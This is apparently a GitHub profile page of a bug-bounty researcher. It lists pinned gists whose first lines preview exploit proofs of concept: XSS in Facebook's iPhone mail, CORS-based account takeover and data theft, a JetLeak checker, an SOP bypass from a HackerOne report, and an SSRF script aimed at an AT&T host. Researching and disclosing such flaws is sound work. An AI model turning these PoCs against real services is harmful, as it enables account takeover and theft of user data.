andripwn
Follow
Taking it easy
Highlights
Pinned Loading
-
iPhone app XSS in Facebook Mail
iPhone app XSS in Facebook Mail 1<script type="text/javascript" src="https://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>
2<script type="text/javascript">
3// https://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9
4$(function(){
5parse_messages = function()
-
Full Account Takeover through CORS w...
Full Account Takeover through CORS with connection Sockets 1<!DOCTYPE html>
2<html>
3<head><title>Exploiting CORS</title></head>
4<body>
5<center>
-
Vulnerable to JetLeak
Vulnerable to JetLeak 1import httplib, urllib, ssl, string, sys, getopt
2import datetime
3from urlparse import urlparse
45f = open('jetleak_' + datetime.datetime.now().strftime('%Y%m%d_%H_%M') + '.txt', 'w')
-
Cross Origin Resource Sharing Miscon...
Cross Origin Resource Sharing Misconfiguration 1<!DOCTYPE html>
2<html>
3<body>
4<center>
5<h3>Steal customer data!</h3>
-
SOP bypass using browser cache (http...
SOP bypass using browser cache (https://hackerone.com/reports/761726) 1<html>
2<script>
3var url = "https://keybase.io/_/api/1.0/user/lookup.json?username={YOUR_USERNAME}";
4fetch(url, {
5method: 'GET',
-
ssrf.py
ssrf.py 1import requests
23url = "https://onlinefaxtwo.att.com/loa.php"
45
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.